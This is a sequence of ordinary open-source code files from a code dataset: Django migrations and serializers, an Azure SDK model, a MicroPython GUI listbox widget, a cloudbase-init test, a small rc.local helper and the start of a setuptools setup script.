            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='CustomLogEntry',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='EmailLogEntry',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('subject', models.CharField(blank=True, max_length=500)),
                ('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
                ('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='IDRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='ReturnsRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
    ]
| 67.408759 | 666 | 0.63216 |
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
('data', django.contrib.postgres.fields.jsonb.JSONField()),
('correctness_disclaimer', models.BooleanField(default=False)),
('further_information_disclaimer', models.BooleanField(default=False)),
('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
('lodgement_sequence', models.IntegerField(blank=True, default=0)),
('lodgement_date', models.DateField(blank=True, null=True)),
('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ApplicationCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
],
),
migrations.CreateModel(
name='ApplicationLogEntry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(blank=True)),
('created', models.DateField(auto_now_add=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AssessmentCondition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.IntegerField()),
('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
],
),
migrations.CreateModel(
name='AmendmentRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='Assessment',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
('comment', models.TextField(blank=True)),
('purpose', models.TextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='CustomLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=200, verbose_name='Subject / Description')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='EmailLogEntry',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('subject', models.CharField(blank=True, max_length=500)),
('to', models.CharField(blank=True, max_length=500, verbose_name='To')),
('from_email', models.CharField(blank=True, max_length=200, verbose_name='From')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='IDRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('missing', 'There is currently no Photographic Identification uploaded'), ('expired', 'The current identification has expired'), ('not_recognised', 'The current identification is not recognised by the Department of Parks and Wildlife'), ('illegible', 'The current identification image is of poor quality and cannot be made out.'), ('other', 'Other')], default='missing', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
migrations.CreateModel(
name='ReturnsRequest',
fields=[
('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
('reason', models.CharField(choices=[('outstanding', 'There are currently outstanding returns for the previous licence'), ('other', 'Other')], default='outstanding', max_length=30, verbose_name='Reason')),
],
options={
'abstract': False,
},
bases=('wl_applications.applicationlogentry',),
),
]
| true | true |
f72ece5f6adcb5d43dae9e1a19b386550d5d1375 | 1,895 | py | Python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2022-03-30T22:39:15.000Z | 2022-03-30T22:39:15.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/usage_py3.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2017-01-20T18:25:46.000Z | 2017-05-12T21:31:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Usage(Model):
    """Describes Compute Resource Usage.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar unit: Required. An enum describing the unit of usage measurement.
     Default value: "Count" .
    :vartype unit: str
    :param current_value: Required. The current usage of the resource.
    :type current_value: int
    :param limit: Required. The maximum permitted usage of the resource.
    :type limit: int (serialized on the wire as a 64-bit 'long')
    :param name: Required. The name of the type of usage.
    :type name: ~azure.mgmt.compute.v2016_03_30.models.UsageName
    """

    # msrest validation rules: every field is required; 'unit' is a
    # constant and may not be overridden per-instance.
    _validation = {
        'unit': {'required': True, 'constant': True},
        'current_value': {'required': True},
        'limit': {'required': True},
        'name': {'required': True},
    }

    # Maps Python attribute names to wire (JSON) keys and msrest types.
    _attribute_map = {
        'unit': {'key': 'unit', 'type': 'str'},
        'current_value': {'key': 'currentValue', 'type': 'int'},
        'limit': {'key': 'limit', 'type': 'long'},
        'name': {'key': 'name', 'type': 'UsageName'},
    }

    # Class-level constant: the service always measures usage as a count.
    unit = "Count"

    def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
        super(Usage, self).__init__(**kwargs)
        self.current_value = current_value
        self.limit = limit
        self.name = name
| 34.454545 | 82 | 0.594195 |
from msrest.serialization import Model
class Usage(Model):
_validation = {
'unit': {'required': True, 'constant': True},
'current_value': {'required': True},
'limit': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'int'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
unit = "Count"
def __init__(self, *, current_value: int, limit: int, name, **kwargs) -> None:
super(Usage, self).__init__(**kwargs)
self.current_value = current_value
self.limit = limit
self.name = name
| true | true |
f72ecf12d2a5bde9b692d56fb3192d8e48a7530b | 1,188 | py | Python | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | pylinux/system_file/rc_local.py | ruiruige/pylinux | a0a85e8928d7847c0596b21c9213bc7863037297 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# coding=utf-8
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
    """Configuration-file wrapper for ``/etc/rc.local``."""
    def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
                 file_config=RcLocalFileConfig()):
        # NOTE(review): ``file_config=RcLocalFileConfig()`` is evaluated once
        # at import time and shared by every instance constructed with the
        # default — confirm RcLocalFileConfig is stateless.
        super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
    def add_boot_item(self, cmd, name):
        """Add a boot (startup) item.

        :param cmd: command line to execute at boot
        :param name: identifier for the entry
        """
        if not name:
            raise NameNotValidException("name not valid while adding boot item")
        if not cmd:
            raise SettingNotValidException("setting not valid while adding boot item")
        # NOTE(review): arguments are only validated here; nothing is ever
        # written via the modifier — implementation appears incomplete.
    def add_multi_line_setting(self, name, value):
        # Not implemented for rc.local files.
        pass
| 33.942857 | 100 | 0.733165 |
from pylinux.common.file_config.rc_local_file_config import RcLocalFileConfig
from pylinux.common.modifier.rc_local_modifier import RcLocalModifier
from pylinux.common.acessor.rc_local_accessor import RcLocalAccessor
from pylinux.system_file.base_system_file import BaseSystemFile
from pylinux.exception.name_not_valid_exception import NameNotValidException
from pylinux.exception.setting_not_valid_exception import SettingNotValidException
class RcLocal(BaseSystemFile):
def __init__(self, filepath="/etc/rc.local", searcher=RcLocalAccessor, modifier=RcLocalModifier,
file_config=RcLocalFileConfig()):
super(RcLocal, self).__init__(filepath, searcher, modifier, file_config=file_config)
def add_boot_item(self, cmd, name):
if not name:
raise NameNotValidException("name not valid while adding boot item")
if not cmd:
raise SettingNotValidException("setting not valid while adding boot item")
def add_multi_line_setting(self, name, value):
pass
| true | true |
f72ed12b9dd621b1fa7446c773458608d1e04750 | 6,036 | py | Python | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | gui/widgets/listbox.py | bartcerneels/micropython-micro-gui | 5ed42f918d5fb9796d2a013977b00c01a64c2158 | [
"MIT"
] | null | null | null | # listbox.py Extension to ugui providing the Listbox class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2021 Peter Hinch
# 12 Sep 21 Support for scrolling.
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
# Behaviour has issues compared to touch displays because movement between
# entries is sequential. This can affect the choice in when the callback runs.
# It always runs when select is pressed. See 'also' ctor arg.
class Listbox(Widget):
    """Scrollable list of text entries with a single current selection.

    ``elements`` may be a sequence of strings, or of ``[text, callback,
    args]`` sequences, in which case each entry carries its own callback
    (dispatched via ``despatch``) and the ``callback`` ctor arg must be
    left at its default.
    """
    ON_MOVE = 1 # Also run whenever the currency moves.
    ON_LEAVE = 2 # Also run on exit from the control.

    # This is used by dropdown.py
    @staticmethod
    def dimensions(writer, elements, dlines):
        """Return (entry_height, control_height, dlines, text_width)."""
        # Height of a single entry in list.
        entry_height = writer.height + 2 # Allow a pixel above and below text
        # Number of displayable lines
        dlines = len(elements) if dlines is None else dlines
        # Height of control
        height = entry_height * dlines + 2
        textwidth = max(writer.stringlen(s) for s in elements) + 4
        return entry_height, height, dlines, textwidth

    def __init__(self, writer, row, col, *,
                 elements,
                 dlines=None, width=None, value=0,
                 fgcolor=None, bgcolor=None, bdcolor=False,
                 fontcolor=None, select_color=DARKBLUE,
                 callback=dolittle, args=[], also=0):
        e0 = elements[0]
        # Check whether elements specified as (str, str,...) or ([str, callback, args], [...)
        if isinstance(e0, tuple) or isinstance(e0, list):
            self.els = elements # Retain original for .despatch
            self.elements = [x[0] for x in elements] # Copy text component
            if callback is not dolittle:
                raise ValueError('Cannot specify callback.')
            self.cb = self.despatch
        else:
            self.cb = callback
            self.elements = elements
        if any(not isinstance(s, str) for s in self.elements):
            raise ValueError('Invalid elements arg.')
        # Calculate dimensions
        self.entry_height, height, self.dlines, tw = self.dimensions(
            writer, self.elements, dlines)
        if width is None:
            width = tw # Text width
        self.also = also
        self.ntop = 0 # Top visible line
        if not isinstance(value, int):
            value = 0 # Or ValueError?
        elif value >= self.dlines: # Must scroll
            value = min(value, len(elements) - 1)
            self.ntop = value - self.dlines + 1
        super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
        self.cb_args = args
        self.select_color = select_color
        self.fontcolor = fontcolor
        self._value = value # No callback until user selects
        self.ev = value # Value change detection

    def show(self):
        """Draw the visible window of entries, highlighting the current one.

        Entries wider than the control are clipped character by character;
        short vertical bars at top/bottom hint that more entries exist
        above/below the visible window.
        """
        if not super().show(False): # Clear to self.bgcolor
            return
        x = self.col
        y = self.row
        eh = self.entry_height
        ntop = self.ntop
        dlines = self.dlines
        nlines = min(dlines, len(self.elements)) # Displayable lines
        for n in range(ntop, ntop + nlines):
            text = self.elements[n]
            if self.writer.stringlen(text) > self.width: # Clip
                font = self.writer.font
                pos = 0
                nch = 0
                for ch in text:
                    pos += font.get_ch(ch)[2] # width of current char
                    if pos > self.width:
                        break
                    nch += 1
                text = text[: nch]
            if n == self._value:
                display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
                display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
            else:
                display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
            y += eh
        # Draw a vertical line to hint at scrolling
        x = self.col + self.width - 2
        if ntop:
            display.vline(x, self.row, eh - 1, self.fgcolor)
        if ntop + dlines < len(self.elements):
            y = self.row + (dlines - 1) * eh
            display.vline(x, y, eh - 1, self.fgcolor)

    def textvalue(self, text=None): # if no arg return current text
        """Get the current entry's text, or set the current entry by text.

        Returns the matched index when setting, or None if *text* is not
        an element.
        """
        if text is None:
            return self.elements[self._value]
        else: # set value by text
            try:
                v = self.elements.index(text)
            except ValueError:
                v = None
            else:
                if v != self._value:
                    self.value(v)
            return v

    def _vchange(self, vnew): # A value change is taking place
        """Apply a currency change, scrolling the window if needed."""
        # Handle scrolling
        if vnew >= self.ntop + self.dlines:
            self.ntop = vnew - self.dlines + 1
        elif vnew < self.ntop:
            self.ntop = vnew
        self.value(vnew)
        if (self.also & Listbox.ON_MOVE): # Treat as if select pressed
            self.do_sel()

    def do_adj(self, _, val):
        """Move currency up (val > 0) or down (val < 0) within bounds."""
        v = self._value
        if val > 0:
            if v:
                self._vchange(v -1)
        elif val < 0:
            if v < len(self.elements) - 1:
                self._vchange(v + 1)

    # Callback runs if select is pressed. Also (if ON_LEAVE) if user changes
    # list currency and then moves off the control. Otherwise if we have a
    # callback that refreshes another control, that second control does not
    # track currency.
    def do_sel(self): # Select was pushed
        self.ev = self._value
        self.cb(self, *self.cb_args)

    def enter(self):
        """Record the value on entry so leave() can detect a change."""
        self.ev = self._value # Value change detection

    def leave(self):
        """Fire the callback on exit if ON_LEAVE is set and currency moved."""
        if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
            self.do_sel()

    def despatch(self, _): # Run the callback specified in elements
        x = self.els[self()]
        x[1](self, *x[2])
| 37.962264 | 102 | 0.567594 |
from gui.core.ugui import Widget, display
from gui.core.colors import *
dolittle = lambda *_ : None
class Listbox(Widget):
ON_MOVE = 1
ON_LEAVE = 2
@staticmethod
def dimensions(writer, elements, dlines):
entry_height = writer.height + 2
dlines = len(elements) if dlines is None else dlines
height = entry_height * dlines + 2
textwidth = max(writer.stringlen(s) for s in elements) + 4
return entry_height, height, dlines, textwidth
def __init__(self, writer, row, col, *,
elements,
dlines=None, width=None, value=0,
fgcolor=None, bgcolor=None, bdcolor=False,
fontcolor=None, select_color=DARKBLUE,
callback=dolittle, args=[], also=0):
e0 = elements[0]
if isinstance(e0, tuple) or isinstance(e0, list):
self.els = elements
self.elements = [x[0] for x in elements]
if callback is not dolittle:
raise ValueError('Cannot specify callback.')
self.cb = self.despatch
else:
self.cb = callback
self.elements = elements
if any(not isinstance(s, str) for s in self.elements):
raise ValueError('Invalid elements arg.')
self.entry_height, height, self.dlines, tw = self.dimensions(
writer, self.elements, dlines)
if width is None:
width = tw
self.also = also
self.ntop = 0
if not isinstance(value, int):
value = 0
elif value >= self.dlines:
value = min(value, len(elements) - 1)
self.ntop = value - self.dlines + 1
super().__init__(writer, row, col, height, width, fgcolor, bgcolor, bdcolor, value, True)
self.cb_args = args
self.select_color = select_color
self.fontcolor = fontcolor
self._value = value
self.ev = value
def show(self):
if not super().show(False):
return
x = self.col
y = self.row
eh = self.entry_height
ntop = self.ntop
dlines = self.dlines
nlines = min(dlines, len(self.elements))
for n in range(ntop, ntop + nlines):
text = self.elements[n]
if self.writer.stringlen(text) > self.width:
font = self.writer.font
pos = 0
nch = 0
for ch in text:
pos += font.get_ch(ch)[2]
if pos > self.width:
break
nch += 1
text = text[: nch]
if n == self._value:
display.fill_rect(x, y + 1, self.width, eh - 1, self.select_color)
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.select_color)
else:
display.print_left(self.writer, x + 2, y + 1, text, self.fontcolor, self.bgcolor)
y += eh
x = self.col + self.width - 2
if ntop:
display.vline(x, self.row, eh - 1, self.fgcolor)
if ntop + dlines < len(self.elements):
y = self.row + (dlines - 1) * eh
display.vline(x, y, eh - 1, self.fgcolor)
def textvalue(self, text=None):
if text is None:
return self.elements[self._value]
else:
try:
v = self.elements.index(text)
except ValueError:
v = None
else:
if v != self._value:
self.value(v)
return v
def _vchange(self, vnew):
if vnew >= self.ntop + self.dlines:
self.ntop = vnew - self.dlines + 1
elif vnew < self.ntop:
self.ntop = vnew
self.value(vnew)
if (self.also & Listbox.ON_MOVE):
self.do_sel()
def do_adj(self, _, val):
v = self._value
if val > 0:
if v:
self._vchange(v -1)
elif val < 0:
if v < len(self.elements) - 1:
self._vchange(v + 1)
def do_sel(self):
self.ev = self._value
self.cb(self, *self.cb_args)
def enter(self):
self.ev = self._value
def leave(self):
if (self.also & Listbox.ON_LEAVE) and self._value != self.ev:
self.do_sel()
def despatch(self, _):
x = self.els[self()]
x[1](self, *x[2])
| true | true |
f72ed18097959bb4697efab08240d8e8fb10e5cf | 2,166 | py | Python | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 74 | 2015-01-07T17:03:43.000Z | 2022-02-06T17:08:54.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 26 | 2015-02-13T11:32:05.000Z | 2020-11-13T15:02:03.000Z | cloudbaseinit/tests/utils/test_debiface.py | jstopinsek/bsd-cloudinit | 57fb6a6367447102118ff8901bb93d7581d4ca13 | [
"Apache-2.0"
] | 40 | 2015-01-22T17:12:03.000Z | 2021-12-09T20:37:35.000Z | # Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
    """Tests for cloudbaseinit.utils.debiface.parse()."""

    def setUp(self):
        # Build the Debian-style network_config fragment the parser expects.
        date = "2013-04-04"
        content = fake_json_response.get_fake_metadata_json(date)
        self.data = content["network_config"]["debian_config"]

    def _test_parse_nics(self, no_nics=False):
        """Parse self.data and verify the resulting NetworkDetails list.

        :param no_nics: when True, assert that parsing yields nothing.
        """
        nics = debiface.parse(self.data)
        if no_nics:
            self.assertFalse(nics)
            return
        # check what we've got
        nic0 = service_base.NetworkDetails(
            fake_json_response.NAME0,
            fake_json_response.MAC0.upper(),
            fake_json_response.ADDRESS0,
            fake_json_response.NETMASK0,
            fake_json_response.BROADCAST0,
            fake_json_response.GATEWAY0,
            fake_json_response.DNSNS0.split()
        )
        nic1 = service_base.NetworkDetails(
            fake_json_response.NAME1,
            None,
            fake_json_response.ADDRESS1,
            fake_json_response.NETMASK1,
            fake_json_response.BROADCAST1,
            fake_json_response.GATEWAY1,
            None
        )
        self.assertEqual([nic0, nic1], nics)

    def test_nothing_to_parse(self):
        invalid = [None, "", 324242, ("dasd", "dsa")]
        for data in invalid:
            # subTest reports which input failed and keeps the remaining
            # cases running, instead of aborting at the first failure.
            with self.subTest(data=data):
                self.data = data
                self._test_parse_nics(no_nics=True)

    def test_parse(self):
        self._test_parse_nics()
| 33.84375 | 78 | 0.662973 |
import unittest
from cloudbaseinit.metadata.services import base as service_base
from cloudbaseinit.tests.metadata import fake_json_response
from cloudbaseinit.utils import debiface
class TestInterfacesParser(unittest.TestCase):
def setUp(self):
date = "2013-04-04"
content = fake_json_response.get_fake_metadata_json(date)
self.data = content["network_config"]["debian_config"]
def _test_parse_nics(self, no_nics=False):
nics = debiface.parse(self.data)
if no_nics:
self.assertFalse(nics)
return
nic0 = service_base.NetworkDetails(
fake_json_response.NAME0,
fake_json_response.MAC0.upper(),
fake_json_response.ADDRESS0,
fake_json_response.NETMASK0,
fake_json_response.BROADCAST0,
fake_json_response.GATEWAY0,
fake_json_response.DNSNS0.split()
)
nic1 = service_base.NetworkDetails(
fake_json_response.NAME1,
None,
fake_json_response.ADDRESS1,
fake_json_response.NETMASK1,
fake_json_response.BROADCAST1,
fake_json_response.GATEWAY1,
None
)
self.assertEqual([nic0, nic1], nics)
def test_nothing_to_parse(self):
invalid = [None, "", 324242, ("dasd", "dsa")]
for data in invalid:
self.data = data
self._test_parse_nics(no_nics=True)
def test_parse(self):
self._test_parse_nics()
| true | true |
f72ed31f1f958ed758de28189f10278aab1054fa | 727 | py | Python | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | 6 | 2021-03-19T01:06:25.000Z | 2021-09-22T18:47:10.000Z | users/serializers.py | gbleigh5/Library-backend | 3ab938a17411c06b68285a45a8b535ba05afb387 | [
"CC0-1.0"
] | null | null | null | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
    """Serializes the basic profile fields of the active user model."""

    class Meta:
        # get_user_model() resolves the project's configured AUTH_USER_MODEL;
        # 'phone' is assumed to be a field on that custom user model — confirm.
        model = get_user_model()
        fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
    """Serializes a single BorrowedBook loan record."""

    class Meta:
        model = BorrowedBook
        # NOTE(review): 'date_of_Pickup' mirrors the model field's unusual
        # capitalization; renaming it would need a model change + migration.
        fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
    """Serializes a user together with the BorrowedBook records related to them.

    Bug fix: DRF requires every explicitly declared serializer field to be
    listed in ``Meta.fields``; the declared ``user`` field was missing, so
    building this serializer's fields raised ``AssertionError`` ("The field
    'user' was declared on serializer ... but has not been included in the
    'fields' option").  ``user`` is now included; ``borrowed_books`` is kept
    so the original output shape is preserved.
    """

    # Many related BorrowedBook primary keys; the name 'user' is kept for
    # backward compatibility with the original declaration.
    user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())

    class Meta:
        model = get_user_model()
        # NOTE(review): 'borrowed_books' must exist on the user model (e.g. a
        # related_name on a BorrowedBook FK) — confirm against users/models.py.
        fields = ['user', 'borrowed_books']
| 34.619048 | 93 | 0.729023 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import BorrowedBook
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ['id', 'email', 'first_name', 'last_name', 'phone']
class BorrowedBookSerializer(serializers.ModelSerializer):
class Meta:
model = BorrowedBook
fields = ['book_title', 'user', 'phone_number', 'date_of_Pickup', 'date_of_return']
class BorrowedBooksSerializer(serializers.ModelSerializer):
user = serializers.PrimaryKeyRelatedField(many=True, queryset=BorrowedBook.objects.all())
class Meta:
model = get_user_model()
fields = ['borrowed_books']
| true | true |
f72ed3a16a6afdb8aef7e5df2b36580380cf2269 | 6,680 | py | Python | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | 2 | 2017-05-23T12:05:28.000Z | 2018-05-08T20:38:23.000Z | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | EngineRules/setuptools-20.10.1/setup.py | hubertokf/lupsContextServer | 4f3cd2ef0ddc9a62f408de168caf42be770aed69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Distutils setup file, used to install or test 'setuptools'
"""
import io
import os
import sys
import textwrap
# Allow to run setup.py from another directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))

